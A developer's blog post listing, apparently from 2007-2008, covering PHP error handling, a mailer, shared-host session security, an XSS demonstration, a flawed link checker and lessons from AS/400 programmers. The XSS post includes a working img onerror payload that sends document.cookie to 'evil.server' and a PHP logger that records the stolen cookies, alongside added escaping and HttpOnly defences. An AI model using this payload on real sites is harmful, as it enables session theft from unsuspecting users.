Which Fires First? Error Handler or Shutdown Function
April 24th, 2008 by Aaron
I was working on writing a shutdown function for a PHP 4 script and noticed some odd behavior when I was getting errors (no way! I program and get errors? Who knew!?). At any rate, when I would handle my error with my custom function, I noticed the shutdown function was still executing after the error function. (Or when it was a fatal error, the error was shown on the screen but the shutdown function was still run…)
This got me thinking about handling error redirection pages and sending messages on fatal errors in PHP 4 (you’ll remember that a fatal error won’t execute the error handler, and therefore most of our custom code to make a nice ‘message’ won’t execute). But anyway, I digress.
I’m using PHP 5.2; this is the code I used to test:
```php
<?php
function error_function() {
    print 'error function';
}
function shutdown_function() {
    print 'shutdown function';
}
set_error_handler('error_function');
register_shutdown_function('shutdown_function');
// Division by zero is an E_WARNING in PHP 5.2, so the handler above sees it
// (PHP 8 throws DivisionByZeroError here instead).
print 1/0;
?>
```
So, as you can tell, the error handler runs FIRST, and then the shutdown function.
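Since the shutdown function still runs after a fatal error, it is the place to catch the errors the handler never sees. The following is an added example, not the test script from the post; it relies on error_get_last(), which exists from PHP 5.2 on and not in PHP 4, and the function names are the post's own.

```php
<?php
// Added example, not the test script from the post: a shutdown function that
// catches the fatal errors the error handler never sees. It relies on
// error_get_last(), which exists from PHP 5.2 on (not in PHP 4).
function error_function($errno, $errstr, $errfile, $errline)
{
    // Non-fatal errors (warnings, notices) arrive here first ...
    error_log("handled by error_function: [$errno] $errstr at $errfile:$errline");
    return true;   // true = suppress PHP's own message for this error
}

function shutdown_function()
{
    // ... while E_ERROR and friends bypass the handler and only reach the
    // shutdown function, so this is the last chance to log the details and
    // to replace the raw error text with a generic message.
    $fatal = array(E_ERROR, E_PARSE, E_CORE_ERROR, E_COMPILE_ERROR);
    $err = error_get_last();
    if ($err !== null && in_array($err['type'], $fatal, true)) {
        error_log("fatal in shutdown_function: {$err['message']} at {$err['file']}:{$err['line']}");
        if (!headers_sent()) {
            header('HTTP/1.1 500 Internal Server Error');
        }
        print 'Sorry, something went wrong.';   // never echo $err['message'] to the browser
    }
}

set_error_handler('error_function');
register_shutdown_function('shutdown_function');
ini_set('display_errors', '0');   // keep file paths and messages off the screen

trigger_error('just a warning', E_USER_WARNING);   // goes to error_function
this_function_does_not_exist();   // fatal: skips error_function, shutdown_function reports it
?>
```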
SimplePHPMailer
April 24th, 2008 by Aaron
There are very few really easy-to-implement PHP mailer scripts in the wild. They usually try to pump so many features into them that they become difficult to implement or too large a file. For those looking for just a quick drop-in solution that you DON’T need to know PHP to use, SimplePHPMailer was developed. All that is needed is to drop the PHP file into the same area as your form, open it up, and read the instructions. There are some straightforward configuration options with very easy-to-understand comments. Download it for your next quick project.
PHP Shared Host - Session File Browser Script
April 24th, 2008 by Aaron
PHP stores its session information in flat files, unencrypted, by default. In shared hosting situations, this can be a big security issue. This script allows easy access to the attributes of these files as well as decoding of the values stored in them. This script can also be used to audit the security of your current configuration. If other users’ session information is available to you, your information is not secure either!
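An added audit helper in the same spirit (not the script from the post): it reports whether the session directory on the current host could expose session files to other accounts, and shows the usual fix of a private save path. It assumes the default "files" session handler on a POSIX file system; sessionDirReport() and usePrivateSessionDir() are names chosen here.

```php
<?php
// Added audit helper, not the script from the post: reports whether the PHP
// session directory on this host could expose session files to other accounts
// on a shared server. Assumes the default "files" session handler on a POSIX
// file system; sessionDirReport() and usePrivateSessionDir() are my own names.
function sessionDirReport($dir = null)
{
    if ($dir === null) {
        $dir = session_save_path();     // '' means PHP falls back to the system temp dir
        if ($dir === '') {
            $dir = sys_get_temp_dir();
        }
        if (($pos = strrpos($dir, ';')) !== false) {
            $dir = substr($dir, $pos + 1);   // strip an "N;MODE;" prefix if one is configured
        }
    }
    $mode = fileperms($dir) & 0777;
    $report = array(
        'path'             => $dir,
        'mode'             => sprintf('%04o', $mode),
        'owned_by_me'      => fileowner($dir) === getmyuid(),
        'world_readable'   => ($mode & 0004) !== 0,   // others can list sess_* file names
        'world_writable'   => ($mode & 0002) !== 0,   // others can plant or replace session files
        'foreign_readable' => 0,                       // other accounts' session files we can read
    );
    foreach ((array) glob($dir . '/sess_*') as $file) {
        if (fileowner($file) !== getmyuid() && is_readable($file)) {
            $report['foreign_readable']++;
        }
    }
    return $report;
}

// The fix on a shared host: keep session files in a directory only this
// account can reach. Call before session_start().
function usePrivateSessionDir($dir)
{
    if (!is_dir($dir)) {
        mkdir($dir, 0700, true);
    }
    chmod($dir, 0700);
    ini_set('session.save_path', $dir);
}

print_r(sessionDirReport());
?>
```

Any non-zero foreign_readable count, or a world-writable save path, means the host's other accounts can read or replace session data and the save path should be moved.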
XSS with Img OnError attribute
March 19th, 2008 by Aaron
So much of my time is spent worrying over the src or href attributes on images and links that I sometimes forget about the other attributes.
Imagine being able to craft an image that has no blacklisted content in its src but can still make a remote request, logging the user’s cookie information. That’s right, this can be done, using the ‘onerror’ attribute of an image.
What you need to do is create an image whose src is obviously broken or empty. The browser then fires the error event for that element. In the onerror attribute, set the image’s src to a remote URL with document.cookie appended. The remote script logs all requests, and then displays an image.
Check out the code below:
Source page without proper filtering:
```html
<html>
<body>
<h1>test</h1>
<h2>asdf</h2>
<img src="" onerror="this.src='http://evil.server/exploit.php?'+document.cookie" />
</body>
</html>
```
Then, on evil.server, place your image. Finally, top it off with the following code in exploit.php:
```php
<?php
$image_path = 'test.jpg';
header('Accept-Ranges: bytes');
header('Content-Length: ' . filesize($image_path));
header('Keep-Alive: timeout=15, max=2469');
echo file_get_contents($image_path);
file_put_contents("cookieLog.txt", $_SERVER['REQUEST_URI']);
?>
```
Easy as that. Just another reminder to properly filter your user-submitted content.
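What "properly filter" looks like for this case, as an added example that is not code from the post: the unfiltered render beside the output-encoded one, with the post's own img payload as the sample input, plus the HttpOnly cookie flag as a second layer. renderUnsafe(), renderSafe() and hardenSessionCookie() are names chosen here.

```php
<?php
// Added example, not code from the post: the unfiltered render beside the
// encoded one, using the post's own payload as the sample input.
// renderUnsafe()/renderSafe() are my names; $payload is constructed here.
function renderUnsafe($userInput)
{
    // Vulnerable: the string is pasted into the page as markup, so the <img>
    // element is created and its onerror handler runs.
    return '<div class="comment">' . $userInput . '</div>';
}

function renderSafe($userInput)
{
    // Encoded for an HTML body context: < > & " ' become entities, so the
    // browser shows the text and never creates an element or a handler.
    $escaped = htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');
    return '<div class="comment">' . $escaped . '</div>';
}

// Second layer: with HttpOnly set, document.cookie is empty for script even
// if an injection slips past the encoding. Call before session_start().
function hardenSessionCookie()
{
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_secure', '1');   // only send the cookie over HTTPS
}

$payload = '<img src="" onerror="this.src=\'http://evil.server/exploit.php?\'+document.cookie" />';

// Self-check: the encoded output contains no tag and no attribute, only text.
assert(strpos(renderSafe($payload), '<img') === false);
assert(strpos(renderSafe($payload), 'onerror="') === false);
echo renderSafe($payload);
?>
```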
Link Checking Module - 1st attempt
March 19th, 2008 by Aaron
So I wrote some code the other day. It sat in my code repository and I never tested it. I was pretty certain it was going to be some good code, though.
A few weeks later I came back to it and looked through it, and laughed!! Can anyone figure out where ALL the holes are in this code?
```php
<?php
class linkChecker
{
    protected $_links = array();
    protected $_sites = array();

    public function __construct()
    {
    }

    public function addSite($site)
    {
        if (in_array($site, $this->_sites)) {
            throw new linkException("Site already in list");
        }
        $this->_sites[] = $site;
    }

    public function processSites()
    {
        foreach ($this->_sites as $site) {
            $this->_processLinks($site);
        }
    }

    protected function _processLinks($url)
    {
        $this->_addLink($url, $url);
        $d = new DomDocument;
        @$d->loadHTMLFile($url);
        foreach ($d->getElementsByTagName('a') as $link) {
            $this->_addLink($link->getAttribute('href'), $url);
        }
        unset($d);
    }

    protected function _addLink($link, $url)
    {
        $l = new checkableLink($link, $url);
        if (!isset($this->_links[$l->url])) {
            $this->_checkLink($l);
            $this->_links[$l->url] = $l;
        }
        unset($l);
    }

    protected function _checkLink(checkableLink &$checkableLink)
    {
        $d = new DomDocument;
        $d->loadHTMLFile($checkableLink->url) or $checkableLink->valid = false;
    }
}

class checkableLink
{
    public $host = null;
    public $url = null;
    public $checked = false;
    public $valid = true;

    public function __construct($link = null, $url = null)
    {
        if (stripos($link, '/') === 0) {
            $this->url = $url . $link;
        } else {
            $this->url = $url;
        }
    }
}

class linkException extends exception {}
?>
```
5 Things this PHP programmer learned from System-i/as400 programmers
December 9th, 2007 by Aaron
Working in a shop that has approximately 15 times more System-i AS/400 iSeries (whatever you want to call it) programmers, I’ve been immersed in their culture, standards and mindset.
As you can imagine, as a fresh new programmer for emerging web technologies, there was some struggle between me and the analysts for this older language. However, as I stepped back and actually looked at their directions, suggestions and practice, I found 5 things that I actually should integrate into my methodology.
1. Make necessary text settings dynamic using databases
Generally, these programmers have progressed through their careers under highly strict and auditable programming and promote-to-production environments. Because of that, they tend to keep a lot of the actual text in their applications separate from their programming logic. This allows them to get their application out in production, and then just change the data in the databases (or files, as they call them; also, in our environment, changing data is a lot easier than changing programming).
PHP programmers should be used to this as well when creating multi language applications. I learned that this could be useful in situations where I only have one language - especially when working with business users who aren’t fully set on their wording until after the application hits production. (Just recently, I changed 3 help texts for an application at work - and it took me about 3 minutes of database manipulation - rather than an hour of checking out code, modifying it, repromoting it, etc.)
2. Handle additional logic situations by creating database-driven action rules
For whatever reason, you might find yourself wanting to introduce different language for different partners (in our case states). Previously, we had created state switch statements in shared code to determine what to do for any particular state. However, this means that I had to keep the code up to date in areas where it wasn’t explicitly shared with code that referenced specific states. If we added a new state ever, we’d have to go and modify everyone’s code again.
The System-i programmers had been creating rules for this type of situation. Basically, a rule is a numeric record with a state or environment specifier and then a yes/no value. Then, they would intelligently program their logic around these rules. The environment or state where the rule was being retrieved from had the proper value for that state. For example, if I were getting rule 114 from WI.t_rules it might be 1. Rule 114 from IA.t_rules would have a 0. This also adds flexibility for environments that made a decision to do it one way, but now want to do it another way.
3. Separate your logic into smaller objects and keep your display separate
System-i programmers can make display files, which are basically a type of interface to show data. Also, they are moving to more and more of a modularized system, which is something I’ve always wanted to do (using the MVC pattern). They are introducing more service programs whose only duty is to take a parameter, do a quick specific calculation and return the result. This was a cool reiteration of a programming concept that I already knew. Their service programs are very similar to web services, which is encouraging me to keep thinking of building a more service-oriented architecture.
4. Validate your data
Although this is an obvious thing, and something I shouldn’t have had to re-learn, you do end up getting lazy when you’re programming for your own projects all the time. When you send something to the System-i, say a date field, and it is in an incorrect format, it will cause their program to hang (that is to say, halt and hold crash information in memory for someone to analyze). Because of this, my connection is blocking, and my page freezes too (this could be solved with a proper time-out, but we’re not covering that here). When a program hangs, a page is generated to the System-i programmer on call. You can imagine that they’re really irritated if it’s in the middle of the night.
At any rate, PHP has let me become a little bit lazy. If I send an invalid date format to a function, it’ll just error - but most often continue to run. This was a good experience for me to have - I’m far more diligent about error checking my data before it even leaves my script.
5. Not everyone is a programmer / I take stack programmers for granted
This one is kind of a double point. It’s amazing to me that there are two types of workers on the System-i side: the system analysts and the programmers. SAs are responsible for quoting, designing and generally architecting the project requests that come through. The programmers take those specifications and make them reality. This is a little bit different for me, as I’ve always just been in charge from start to finish. I still pretty much am right now in this organization; I do get assisted by the SAs when the project is very cross-platform, however.
The other thing that caused me some surprise is that the programmers and analysts don’t know the intricate details about their stack, that is, the whole environment and programming box they’re using. They have an administrator who is a lot more familiar with the environment. This is kind of different for a LAMP programmer. I originally looked down on them for that, but then I realized it was positive for two reasons: it had security benefits, and it separated duty and responsibility to allow more specialization.
These two things, after I realized they even existed, helped me communicate with my peers on the System-i programming side a lot better, more efficiently and more accurately.
So, although I like to give some of the more fun system-i programmers a hard time about programming on an old archaic language and that they can’t handle us young hotshots, there is a lot to gather from these experienced programmers.
APD post processing wrapper
November 17th, 2007 by Aaron
A while ago, I discovered the ‘joys’ of APD… and then, even more so, the ‘joys’ of not being able to make heads or tails of the output script. After digging deeper, I saw that the original directory already had some PHP scripts to parse the output. I ran those and wasn’t very impressed. Even more important, my boss wouldn’t be impressed. I needed to make something that could be useful to integrate into a table (I finally used dojo to create a table…)
At any rate, I thought I might save anyone some time by posting the code here:
MySpace bulletins to RSS
September 27th, 2007 by Aaron
So I’m sick of MySpace… or so I say to myself. So now I log in about half as often as I did before… and this is because I’ve made the following script. It logs in and grabs each bulletin from your top bulletins. Then, it creates an RSS feed from them.
Let’s check it out:
Create Google Advanced Search String
September 25th, 2007 by Aaron
I found an interesting article about the parameters of the advanced search URL for Google. Just for fun, I tested out their concepts and they were all true. I figured maybe there was a reason to do this as a PHP class (I think I was just bored…).
You can find the code here:
Create an RSS feed of comments from myspace
September 8th, 2007 by Aaron
Lately, I’ve been trying to find ways to reduce the amount of time I spend on stupid sites like MySpace (never mind the fact that the time it took to reduce this amount was enough time to visit MySpace once a day for another month, heh). At any rate, I’ve been using Google Reader a lot more (I’m up to 180 or so feeds) and I thought: why don’t I make an RSS feed of my comments? Then I don’t have to go back to the site when someone sends me a comment. (Mind you, MySpace does send you an e-mail when you receive a comment, but it doesn’t include the content. JEMDiary does, however ;)) I searched the internet and found a few sites that are doing that as a service, and one guy who was giving away a regular expression. So, I took his idea and wrote my own PHP script for cron. Check it out here:
